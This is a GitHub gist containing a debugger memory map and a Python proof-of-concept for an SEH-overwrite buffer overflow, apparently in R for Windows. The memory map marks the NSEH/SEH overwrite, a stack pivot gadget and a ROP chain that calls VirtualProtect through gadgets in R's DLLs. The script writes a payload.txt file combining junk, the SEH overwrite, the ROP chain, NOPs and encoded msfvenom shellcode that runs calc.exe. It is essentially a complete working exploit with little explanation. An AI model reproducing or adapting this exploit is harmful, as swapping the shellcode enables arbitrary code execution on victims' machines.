Skip to content

Instantly share code, notes, and snippets.

@SkyBulk

SkyBulk/memory map

Last active August 14, 2019 13:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SkyBulk/d6e0265aa2a429729773c4c1a5656bcd to your computer and use it in GitHub Desktop.
Save SkyBulk/d6e0265aa2a429729773c4c1a5656bcd to your computer and use it in GitHub Desktop.
Download ZIP
Raw
memory map
0141E388 41414141 AAAA `<----------- ESP starts here`
0141E38C 41414141 AAAA
0141E390 41414141 AAAA
0141E394 41414141 AAAA
0141E398 41414141 AAAA
0141E39C 41414141 AAAA
0141E3A0 41414141 AAAA
0141E3A4 41414141 AAAA
0141E3A8 41414141 AAAA
0141E3AC 41414141 AAAA
0141E3B0 41414141 AAAA
0141E3B4 41414141 AAAA
0141E3B8 41414141 AAAA
0141E3BC 41414141 AAAA
0141E3C0 41414141 AAAA
0141E3C4 41414141 AAAA
0141E3C8 41414141 AAAA `<---------- we are here`
0141E3CC 41414141 AAAA
0141E3D0 41414141 AAAA
0141E3D4 41414141 AAAA
0141E3D8 41414141 AAAA
0141E3DC 41414141 AAAA
0141E3E0 41414141 AAAA
0141E3E4 41414141 AAAA
0141E3E8 41414141 AAAA
0141E3EC 41414141 AAAA
0141E3F0 41414141 AAAA
0141E3F4 41414141 AAAA
0141E3F8 41414141 AAAA
0141E3FC 41414141 AAAA
0141E400 41414141 AAAA
0141E404 41414141 AAAA
0141E408 41414141 AAAA
0141E40C 41414141 AAAA
0141E410 41414141 AAAA
0141E414 41414141 AAAA
0141E418 41414141 AAAA
0141E41C 41414141 AAAA
0141E420 41414141 AAAA
0141E424 41414141 AAAA
0141E428 41414141 AAAA
0141E42C 41414141 AAAA
0141E430 41414141 AAAA
0141E434 41414141 AAAA
0141E438 41414141 AAAA
0141E43C 41414141 AAAA
0141E440 41414141 AAAA
0141E444 41414141 AAAA
0141E448 41414141 AAAA
0141E44C 41414141 AAAA
0141E450 41414141 AAAA
0141E454 41414141 AAAA
0141E458 41414141 AAAA
0141E45C 41414141 AAAA
0141E460 41414141 AAAA
0141E464 41414141 AAAA
0141E468 41414141 AAAA
0141E46C 41414141 AAAA
0141E470 41414141 AAAA
0141E474 41414141 AAAA
0141E478 41414141 AAAA
0141E47C 41414141 AAAA
0141E480 41414141 AAAA
0141E484 41414141 AAAA
0141E488 41414141 AAAA
0141E48C 41414141 AAAA
0141E490 41414141 AAAA
0141E494 41414141 AAAA
0141E498 41414141 AAAA
0141E49C 41414141 AAAA
0141E4A0 41414141 AAAA
0141E4A4 41414141 AAAA
0141E4A8 41414141 AAAA
0141E4AC 41414141 AAAA
0141E4B0 41414141 AAAA
0141E4B4 41414141 AAAA
0141E4B8 41414141 AAAA
0141E4BC 41414141 AAAA
0141E4C0 41414141 AAAA
0141E4C4 41414141 AAAA
0141E4C8 41414141 AAAA
0141E4CC 41414141 AAAA
0141E4D0 41414141 AAAA
0141E4D4 41414141 AAAA
0141E4D8 41414141 AAAA
0141E4DC 41414141 AAAA
0141E4E0 41414141 AAAA
0141E4E4 41414141 AAAA
0141E4E8 41414141 AAAA
0141E4EC 41414141 AAAA
0141E4F0 41414141 AAAA
0141E4F4 41414141 AAAA
0141E4F8 41414141 AAAA
0141E4FC 41414141 AAAA
0141E500 41414141 AAAA
0141E504 41414141 AAAA
0141E508 41414141 AAAA
0141E50C 41414141 AAAA
0141E510 41414141 AAAA
0141E514 41414141 AAAA
0141E518 41414141 AAAA
0141E51C 41414141 AAAA
0141E520 41414141 AAAA
0141E524 41414141 AAAA
0141E528 41414141 AAAA
0141E52C 41414141 AAAA
0141E530 41414141 AAAA
0141E534 41414141 AAAA
0141E538 41414141 AAAA
0141E53C 41414141 AAAA
0141E540 41414141 AAAA
0141E544 41414141 AAAA
0141E548 41414141 AAAA
0141E54C 41414141 AAAA
0141E550 41414141 AAAA
0141E554 41414141 AAAA
0141E558 41414141 AAAA
0141E55C 41414141 AAAA
0141E560 41414141 AAAA
0141E564 41414141 AAAA
0141E568 41414141 AAAA
0141E56C 41414141 AAAA
0141E570 41414141 AAAA
0141E574 41414141 AAAA
0141E578 41414141 AAAA
0141E57C 41414141 AAAA
0141E580 41414141 AAAA
0141E584 41414141 AAAA
0141E588 41414141 AAAA
0141E58C 41414141 AAAA
0141E590 41414141 AAAA
0141E594 41414141 AAAA
0141E598 41414141 AAAA
0141E59C 41414141 AAAA
0141E5A0 41414141 AAAA
0141E5A4 41414141 AAAA
0141E5A8 41414141 AAAA
0141E5AC 41414141 AAAA
0141E5B0 41414141 AAAA
0141E5B4 41414141 AAAA
0141E5B8 41414141 AAAA
0141E5BC 41414141 AAAA
0141E5C0 41414141 AAAA
0141E5C4 41414141 AAAA
0141E5C8 41414141 AAAA
0141E5CC 41414141 AAAA
0141E5D0 41414141 AAAA
0141E5D4 41414141 AAAA
0141E5D8 41414141 AAAA
0141E5DC 41414141 AAAA
0141E5E0 41414141 AAAA
0141E5E4 41414141 AAAA
0141E5E8 41414141 AAAA
0141E5EC 41414141 AAAA
0141E5F0 41414141 AAAA
0141E5F4 41414141 AAAA
0141E5F8 41414141 AAAA
0141E5FC 41414141 AAAA
0141E600 41414141 AAAA
0141E604 41414141 AAAA
0141E608 41414141 AAAA
0141E60C 41414141 AAAA
0141E610 41414141 AAAA
0141E614 41414141 AAAA
0141E618 41414141 AAAA
0141E61C 41414141 AAAA
0141E620 41414141 AAAA
0141E624 41414141 AAAA
0141E628 41414141 AAAA
0141E62C 41414141 AAAA
0141E630 41414141 AAAA
0141E634 41414141 AAAA
0141E638 41414141 AAAA
0141E63C 41414141 AAAA
0141E640 41414141 AAAA
0141E644 41414141 AAAA
0141E648 41414141 AAAA
0141E64C 41414141 AAAA
0141E650 41414141 AAAA
0141E654 41414141 AAAA
0141E658 41414141 AAAA
0141E65C 41414141 AAAA
0141E660 41414141 AAAA
0141E664 41414141 AAAA
0141E668 41414141 AAAA
0141E66C 41414141 AAAA
0141E670 41414141 AAAA
0141E674 41414141 AAAA
0141E678 41414141 AAAA
0141E67C 41414141 AAAA
0141E680 41414141 AAAA
0141E684 41414141 AAAA
0141E688 41414141 AAAA
0141E68C 41414141 AAAA
0141E690 41414141 AAAA
0141E694 41414141 AAAA
0141E698 41414141 AAAA
0141E69C 41414141 AAAA
0141E6A0 41414141 AAAA
0141E6A4 41414141 AAAA
0141E6A8 41414141 AAAA
0141E6AC 41414141 AAAA
0141E6B0 41414141 AAAA
0141E6B4 41414141 AAAA
0141E6B8 41414141 AAAA
0141E6BC 41414141 AAAA
0141E6C0 41414141 AAAA
0141E6C4 41414141 AAAA
0141E6C8 41414141 AAAA
0141E6CC 41414141 AAAA
0141E6D0 41414141 AAAA
0141E6D4 41414141 AAAA
0141E6D8 41414141 AAAA
0141E6DC 41414141 AAAA
0141E6E0 41414141 AAAA
0141E6E4 41414141 AAAA
0141E6E8 41414141 AAAA
0141E6EC 41414141 AAAA
0141E6F0 41414141 AAAA
0141E6F4 41414141 AAAA
0141E6F8 41414141 AAAA
0141E6FC 41414141 AAAA
0141E700 41414141 AAAA
0141E704 41414141 AAAA
0141E708 41414141 AAAA
0141E70C 41414141 AAAA
0141E710 41414141 AAAA
0141E714 41414141 AAAA
0141E718 41414141 AAAA
0141E71C 41414141 AAAA
0141E720 41414141 AAAA
0141E724 41414141 AAAA
0141E728 41414141 AAAA
0141E72C 41414141 AAAA
0141E730 41414141 AAAA
0141E734 41414141 AAAA
0141E738 41414141 AAAA
0141E73C 41414141 AAAA
0141E740 41414141 AAAA
0141E744 41414141 AAAA
0141E748 41414141 AAAA
0141E74C 41414141 AAAA
0141E750 41414141 AAAA
0141E754 41414141 AAAA
0141E758 41414141 AAAA
0141E75C 41414141 AAAA
0141E760 41414141 AAAA
0141E764 41414141 AAAA
0141E768 41414141 AAAA
0141E76C 41414141 AAAA
0141E770 41414141 AAAA
0141E774 41414141 AAAA
0141E778 41414141 AAAA
0141E77C 42424242 BBBB Pointer to next SEH record `<------ NSEH`
0141E780 6C90B9C8 ȹl SE handler `<------- stack pivot 0x6c90b9c8 : {pivot 1916 / 0x77c} : # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}`
0141E784 6C998F58 X™l R.6C998F58 `<--------- starts our ROP chain`
0141E788 6379973C <—yc <&KERNEL32.VirtualProtect>
0141E78C 6FEE2984 „)îo grDevice.6FEE2984
0141E790 6CA1BA76 vº¡l R.6CA1BA76
0141E794 64C45CB8 ¸\Äd methods.64C45CB8
0141E798 64C46010 `Äd methods.64C46010
0141E79C 6CACC7E2 âǬl R.6CACC7E2
0141E7A0 FFFFFFC0 Àÿÿÿ
0141E7A4 7139C7BA ºÇ9q stats.7139C7BA
0141E7A8 6CA3485A ZH£l R.6CA3485A
0141E7AC 7135A862 b¨5q stats.7135A862
0141E7B0 FFFFFDFF ÿýÿÿ
0141E7B4 6E7D41CA ÊA}n utils.6E7D41CA
0141E7B8 63742597 —%tc Rgraphap.63742597
0141E7BC 6CBEF3C0 Àó¾l R.6CBEF3C0
0141E7C0 41414141 AAAA
0141E7C4 6C9B1DE7 ç›l R.6C9B1DE7
0141E7C8 6CA2A9BD ½©¢l R.6CA2A9BD
0141E7CC 6CBEBFA6 ¦¿¾l R.6CBEBFA6
0141E7D0 90909090 
0141E7D4 6CA00E93 “ l R.6CA00E93
0141E7D8 6375FE5C \þuc Rgraphap.6375FE5C
0141E7DC 6FF1B7BB »·ño grDevice.6FF1B7BB
0141E7E0 90909090 
0141E7E4 90909090 
0141E7E8 90909090 
0141E7EC 90909090 
0141E7F0 90909090 
0141E7F4 90BFCEDB Ûο `<-------- starts our shellcode `
PoC
#!/usr/bin/python
import struct
outfile = 'payload.txt'
def create_rop_chain():
rop_gadgets = [
0x6c998f58, # POP EAX # RETN [R.dll]
0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
0x64c46010, # &Writable location [methods.dll]
0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0xffffffc0, # Value to negate, will become 0x00000040
0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0xfffffdff, # Value to negate, will become 0x00000201
0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x41414141, # Filler (compensate)
0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x6ca2a9bd, # & jmp esp [R.dll]
0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x90909090, # nop
0x6ca00e93, # POP EDI # RETN [R.dll]
0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
junk = "A" * 1012
nseh = struct.pack("<L", 0x42424242) # jmp short 6
seh = struct.pack("<L", 0x6c90b9c8) # 0x6c90b9c8 : {pivot 1916 / 0x77c} : # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python
nops = "\x90" * 20
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
padding = "D" * (8000-1012-4-4-len(shellcode))
payload = junk + nseh + seh + rop_chain + nops + shellcode + padding
with open(outfile, 'w') as file:
file.write(payload)
print "txt payload File Created\n"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment